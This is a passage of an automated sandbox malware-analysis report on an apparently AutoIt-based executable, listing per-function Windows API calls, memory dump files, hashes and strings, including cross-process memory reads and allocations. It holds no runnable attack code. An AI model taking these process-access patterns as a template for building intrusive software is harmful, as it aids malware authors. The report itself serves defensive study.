                                                                                                                                                                                                                                            • Part of subcall function 0013B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0013B3F8
                                                                                                                                                                                                                                            • Part of subcall function 0013B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0013B355
                                                                                                                                                                                                                                            • Part of subcall function 0013B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00132194,00000034,?,?,00001004,00000000,00000000), ref: 0013B365
                                                                                                                                                                                                                                            • Part of subcall function 0013B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00132194,00000034,?,?,00001004,00000000,00000000), ref: 0013B37B
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001327CD
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0013281A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 80a9f5f82d9297ef3f013558e99c84f01290348bd95e9397d807313a4a091a1a
                                                                                                                                                                                                                                          • Instruction ID: 4bfca624fce1f7783bbd093d6323be238861d479465bc04de7cc758031c141f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80a9f5f82d9297ef3f013558e99c84f01290348bd95e9397d807313a4a091a1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3410C76900218BFDB10DFA4CD85AEEBBB8EF19700F104099FA55B7191DB706E85CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe,00000104), ref: 00101769
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00101834
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010183E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
                                                                                                                                                                                                                                          • API String ID: 2506810119-377130129
                                                                                                                                                                                                                                          • Opcode ID: e744b4ddb5f3e48218a9c0542d2c0e7a2cb693e641dae39624e1db602a5b7530
                                                                                                                                                                                                                                          • Instruction ID: 63c7b97d054abdf0621c1de3f9d8d711eb82278faf51b1db07272847fd5cb28f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e744b4ddb5f3e48218a9c0542d2c0e7a2cb693e641dae39624e1db602a5b7530
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D831A075A40218FBCB21DF999C85D9EBBFCEB95310F20416BF84497291D7B48E40CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0013C306
                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0013C34C
                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001A1990,01095478), ref: 0013C395
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                          • Opcode ID: eca97838b470543b752b58a1600d09ce8513c8523215b034158c337489d1c994
                                                                                                                                                                                                                                          • Instruction ID: 87e5533e97c1f26bc8fca031c41bb4438608d2ccaebab4c11d887d10392f8f89
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eca97838b470543b752b58a1600d09ce8513c8523215b034158c337489d1c994
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D419F712043019FDB24DF25DC84B6ABBE4BF85324F148A1EF9A5A72D1D770E904CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00164416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0016CC08,00000000,?,?,?,?), ref: 001644AA
                                                                                                                                                                                                                                          • GetWindowLongW.USER32 ref: 001644C7
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001644D7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                          • Opcode ID: 3160c73398da08572b476db6d07277e534d1ea5f773544ec7a05c01cfb495896
                                                                                                                                                                                                                                          • Instruction ID: ea8dbc91489dc9b37fcdc3c9ef1309eb31cff5b55ba74fcee99249ad18934a9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3160c73398da08572b476db6d07277e534d1ea5f773544ec7a05c01cfb495896
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A318031210605AFDF219F78DC46BEA7BA9EB09334F204715F975A22E1DB70ECA19B50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0015335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00153077,?,?), ref: 00153378
                                                                                                                                                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0015307A
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015309B
                                                                                                                                                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00153106
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                                                                                                          • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                          • Opcode ID: dd79b425ca4adae2bbd9fe389a5860109e869a0cf96d5b7110714c1c47c5c705
                                                                                                                                                                                                                                          • Instruction ID: 55ad04775c3e6bc16302b9721105262f322adce2c99c91d5389b2770da26dee7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd79b425ca4adae2bbd9fe389a5860109e869a0cf96d5b7110714c1c47c5c705
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D531AF35204305DFCB20CF28C985AAAB7A0EF54399F258059E9358F792DB72EE49C760
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00163F40
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00163F54
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00163F78
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                          • Opcode ID: d01e5f537f1784d6247b08e3eaaa83c1372704d8f885e642f286f692a222d310
                                                                                                                                                                                                                                          • Instruction ID: c6d60bbe65a2395658929e48d96a261436c792662201ff00d84e2d5f00eb4304
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d01e5f537f1784d6247b08e3eaaa83c1372704d8f885e642f286f692a222d310
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE219F32610219BFDF159F90CC46FEA3BB9EF48714F110254FA656B1D0D7B5A9A08BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00164653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00164705
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00164713
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0016471A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                          • Opcode ID: 68b98f1ce0f5653603c9db052464ccd888d0984426dc5002f5839953209f7bb3
                                                                                                                                                                                                                                          • Instruction ID: a4190817e6cec6184d978fa579ce84d420d7a7ad6e6f35cc0a78264adcd18e26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68b98f1ce0f5653603c9db052464ccd888d0984426dc5002f5839953209f7bb3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F217FB5600209AFEB10DF64DCD1DB737ADEF5A3A8B040059FA009B3A1CB71EC61CA60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001395AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                          • API String ID: 176396367-2734436370
                                                                                                                                                                                                                                          • Opcode ID: e462d4f1b19a54aac7aced77a0053eec9a4f37e48a93ef9dcf02617c62e0e421
                                                                                                                                                                                                                                          • Instruction ID: aa435082365a746a85956beb27f27709a9eff484b3d5606d8b37f7b5a9548fd5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e462d4f1b19a54aac7aced77a0053eec9a4f37e48a93ef9dcf02617c62e0e421
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B215B72205611A6C331AB249C03FF773D89F51310F50442BF94A97142EBD1AD92D3E5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001637B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00163840
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00163850
                                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00163876
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                          • Opcode ID: e1e3f0f8fadcfb0d1b729d08d729ca8d9c199b8464b6d7f551b90305e2c6a6c5
                                                                                                                                                                                                                                          • Instruction ID: 334082f7babb553bcb0e42cd68b3e8f57c805554093356bc6ad4cd79acac0c64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e3f0f8fadcfb0d1b729d08d729ca8d9c199b8464b6d7f551b90305e2c6a6c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8217C72610218BBEF219F54DC85EFB376EEF89760F118224F9649B190C7B19C6287A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001449F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00144A08
                                                                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00144A5C
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,0016CC08), ref: 00144AD0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                          • Opcode ID: cdbd663c62b4db96b164a41298bf3b61bdaa5bdd84e1f080bbc2cdfc87ed8559
                                                                                                                                                                                                                                          • Instruction ID: 78fd325d6d3f8ee965bab424fd3f7a701f887f3f428475be457470a7b0151920
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdbd663c62b4db96b164a41298bf3b61bdaa5bdd84e1f080bbc2cdfc87ed8559
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2313575A00209AFDB10DF54C985EAA77F8EF05308F1440A5F909DB362DB71ED45CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001641EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0016424F
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00164264
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00164271
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                          • Opcode ID: e295f2d06a561350860b7967cc8df1b051940567c1c0b25b571ce280a5e6a82c
                                                                                                                                                                                                                                          • Instruction ID: c48c766e817eeb57a82fa96374921938e6254dbc11861a3e634209faeccd20a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e295f2d06a561350860b7967cc8df1b051940567c1c0b25b571ce280a5e6a82c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11E331240208BFEF205E28DC46FAB3BACEF95B54F110118FA55E2090D3B1D8619B20
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00132F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00132DC5
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00132DD6
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: GetCurrentThreadId.KERNEL32 ref: 00132DDD
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00132DE4
                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 00132F78
                                                                                                                                                                                                                                            • Part of subcall function 00132DEE: GetParent.USER32(00000000), ref: 00132DF9
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00132FC3
                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,0013303B), ref: 00132FEB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
